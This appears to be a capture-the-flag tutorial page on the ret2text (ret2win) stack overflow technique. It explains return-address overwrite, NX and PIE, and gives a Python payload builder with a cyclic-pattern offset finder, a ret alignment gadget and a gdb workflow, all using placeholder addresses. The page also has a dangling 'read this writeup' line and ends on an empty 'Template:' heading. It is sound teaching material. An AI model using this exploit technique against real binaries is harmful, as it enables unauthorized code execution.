ret2text

Theory

This attack is also called ret2win. A stack buffer overflow lets us overwrite the saved return address, so we control $rip the moment the vulnerable function returns, and we point it at a function that already exists in the binary (a "hidden" win function that spawns a shell or prints the flag) instead of injecting our own code. Because the target is already in .text, NX does not stop it. If PIE is turned off, the address of this function is fixed and can be read straight from the disassembly; with PIE enabled you first need a leak of the binary's base. Read this writeup to learn more:
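The exploit side of the attack, as an added example that is not from this page or from any of the linked writeups: a pure-Python payload builder (no pwntools) for a ret2text. It assumes an x86-64 binary without PIE whose vulnerable function reads a stack buffer with gets(), so the only bad byte is the newline. The win address 0x401196, the `ret` gadget 0x40101a and the 72-byte offset are constructed placeholders; the offset is recovered from a simulated crash rather than a real binary. cyclic() and cyclic_find() reproduce pwntools' de Bruijn pattern, so the offsets agree with what `cyclic -l` would print.

```python
import struct
from functools import lru_cache
from typing import Optional

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
SUBSEQ = 4  # every 4-byte window of the pattern is unique, like pwntools' cyclic()


@lru_cache(maxsize=None)
def de_bruijn(alphabet: bytes = ALPHABET, n: int = SUBSEQ) -> bytes:
    """de Bruijn sequence B(k, n): each length-n window appears exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern: the input that makes the target crash."""
    return de_bruijn()[:length]


def cyclic_find(chunk: bytes) -> int:
    """Offset of the window found at RSP when the faulting `ret` executes.

    Only the first 4 bytes are used, because the pattern is unique per 4-byte window."""
    return de_bruijn().find(chunk[:SUBSEQ])


def p64(value: int) -> bytes:
    """Pack an address little-endian, the way it sits on the x86-64 stack."""
    return struct.pack("<Q", value)


def build_payload(offset: int, win_addr: int, ret_gadget: Optional[int] = None,
                  badchars: bytes = b"\n") -> bytes:
    """Padding up to the saved return address, optional `ret` for alignment, then win().

    The default badchars suit gets(): it stops at a newline but happily copies NULs."""
    payload = b"A" * offset
    if ret_gadget is not None:
        # A lone `ret` pops one qword and realigns rsp to 16 bytes before win() runs,
        # which avoids the movaps crash seen when win() calls system()/printf.
        payload += p64(ret_gadget)
    payload += p64(win_addr)
    bad = [b for b in badchars if b in payload]
    if bad:
        raise ValueError(f"payload contains bad bytes {bad!r}; the read would truncate")
    return payload


if __name__ == "__main__":
    # Constructed crash: pretend the saved return address lies 72 bytes into the buffer.
    crash_input = cyclic(200)
    rsp_qword = crash_input[72:80]  # what `x/gx $rsp` shows in gdb at the faulting ret
    offset = cyclic_find(rsp_qword)
    # Hypothetical addresses: win() at 0x401196, a `ret` gadget at 0x40101a (non-PIE).
    payload = build_payload(offset, win_addr=0x401196, ret_gadget=0x40101a)
    print(f"offset={offset} payload={payload.hex()}")
```

Workflow: send cyclic(200) to the binary under gdb, read the qword at $rsp when it faults on `ret`, feed that to cyclic_find() to get the offset, then write build_payload() to the process's stdin. Try without the `ret` gadget first; if win() segfaults on a `movaps` instruction inside glibc, the stack is misaligned by 8 and the gadget (any `ret` found with ROPgadget or ropper) fixes it.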

Template:
